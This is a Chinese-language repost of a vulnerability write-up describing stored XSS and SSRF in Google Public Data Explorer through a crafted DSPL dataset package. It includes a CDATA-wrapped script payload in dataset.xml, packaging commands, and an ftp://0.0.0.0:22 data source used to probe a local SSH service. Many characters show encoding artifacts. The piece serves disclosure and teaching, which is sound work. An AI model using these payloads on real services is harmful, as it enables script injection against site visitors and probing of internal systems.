您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關(guān)看我如何構(gòu)造DSPL語(yǔ)言包及發(fā)現(xiàn)Google的存儲(chǔ)型XSS和SSRF漏洞,小編覺得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說(shuō),跟著小編一起來(lái)看看吧。
下面講述我通過(guò)精心制作Google數(shù)據(jù)集發(fā)布語(yǔ)言(DSPL)包,在請(qǐng)求www.google.com的環(huán)境中構(gòu)造出存儲(chǔ)型XSS漏洞,另外,利用DSPL的遠(yuǎn)程數(shù)據(jù)源功能實(shí)現(xiàn)了本地服務(wù)訪問(也即SSRF)。
Google的數(shù)據(jù)集發(fā)布語(yǔ)言:Google利用其具備的強(qiáng)大網(wǎng)絡(luò)數(shù)據(jù)收集能力,在數(shù)據(jù)挖掘和可視化方面擁有多項(xiàng)應(yīng)用,通過(guò)搭建可視化的商業(yè)和公共服務(wù)平,方便第三方公司和個(gè)人充分?jǐn)?shù)據(jù)收集可視化。用戶可以利用Google的數(shù)據(jù)集發(fā)布語(yǔ)言(Dataset Publishing Language,DSPL)接口,把他們自己的數(shù)據(jù)庫(kù)鏈接上Google的可視化工具,實(shí)現(xiàn)方便的個(gè)人定制數(shù)據(jù)可視化。
Google的公開數(shù)據(jù)瀏覽器(Public Data Explorer)是一款數(shù)據(jù)搜索和可視化顯示工具,它以官方數(shù)據(jù)為基礎(chǔ),為一些常見的搜索請(qǐng)求制作圖表,以更加直觀的視覺形式反映出搜索結(jié)果。例如,我們可以利用它來(lái)方便地實(shí)現(xiàn)政府衛(wèi)生支出、世界銀行數(shù)據(jù)等大型數(shù)據(jù)集的搜集和可視化。
DSPL使用XML來(lái)描述數(shù)據(jù)集中的元數(shù)據(jù),還會(huì)用到CSV數(shù)據(jù)文件,例如DSPL下的sample.zip壓縮包格式是這樣的:
Archive: sample.zip
Length Date Time Name
--------- ---------- ----- ----
246 02-01-2018 13:19 countries.csv
221 02-14-2011 17:13 country_slice.csv
7812 03-04-2018 21:12 dataset.xml
246 02-14-2011 17:13 gender_country_slice.csv
28 01-29-2018 20:55 genders.csv
200 02-14-2011 17:13 state_slice.csv
300 01-29-2018 21:11 states.csv
--------- -------
9053 7 files
問題就在于,Google的公開數(shù)據(jù)瀏覽器(Public Data Explorer)在使用數(shù)據(jù)集歸檔中提供的元數(shù)據(jù)時(shí),不會(huì)去檢查這些元數(shù)據(jù)是否經(jīng)過(guò)有效編碼或安全驗(yàn)證。
以下面這個(gè)數(shù)據(jù)集的使用為例:
curl https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/dspl/tutorial1.0.zip -o sample.zip
unzip sample.zip; rm sample.zip
可以對(duì)數(shù)據(jù)集中dataset.xml文件的元數(shù)據(jù)名稱值進(jìn)行更改。另外在以下XML文件中,可以使用CDATA部分來(lái)包含JavaScript的執(zhí)行腳本(Payload),以防止其被當(dāng)做XML標(biāo)記來(lái)解析:
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Some very interesting statistics about countries</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
之后,執(zhí)行以下兩步操作:
zip -r poc.dspl *
將上述精心制作的數(shù)據(jù)集文件上傳到Google公開數(shù)據(jù)瀏覽器中(Public Data Explorer),把它公開分享
這樣一來(lái),只要點(diǎn)擊查看該數(shù)據(jù)集的用戶,都會(huì)在www.google.com請(qǐng)求環(huán)境中被執(zhí)行一段攻擊者精心制作的JavaScript惡意腳本(這種腳本如Coinhive)。
在以下視頻中我們可以看到,構(gòu)造一個(gè)包含惡意腳本的數(shù)據(jù)集壓縮包,上傳部署后,能成功執(zhí)行預(yù)定腳本:
http://v.youku.com/v_show/id_XMzQ3MTM0Njk0OA==.html
https://vimeo.com/258923005
而且,因?yàn)镈SPL還具備從遠(yuǎn)程HTTP或FTP源中進(jìn)行數(shù)據(jù)檢索,所以,利用該功能和上述缺陷可以實(shí)現(xiàn)SSRF攻擊,訪問到某些本地主機(jī)的服務(wù)數(shù)據(jù)資源(另外,深入利用,還可間接訪問到目標(biāo)系統(tǒng)內(nèi)與互聯(lián)網(wǎng)隔離的內(nèi)部網(wǎng)絡(luò)系統(tǒng),進(jìn)一步對(duì)目標(biāo)系統(tǒng)內(nèi)的系統(tǒng)或設(shè)備造成安全威脅)
例如,把poc.dspl/dataset.xml中的內(nèi)容更改如下:
<table id="my_table">
<column id="first" type="string"/>
<column id="last" type="string"/>
<data>
<file format="csv" encoding="utf-8">ftp://0.0.0.0:22</file>
</data>
</table>
在把該數(shù)據(jù)集進(jìn)行上傳分享時(shí),Google服務(wù)端返回了HTTP/FTP請(qǐng)求的出錯(cuò)處理響應(yīng),其中顯示了Google服務(wù)端的SSH詳細(xì)banner信息,實(shí)際上,這本來(lái)就是一種不應(yīng)公開顯示的服務(wù)端信息:
以上就是看我如何構(gòu)造DSPL語(yǔ)言包及發(fā)現(xiàn)Google的存儲(chǔ)型XSS和SSRF漏洞,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。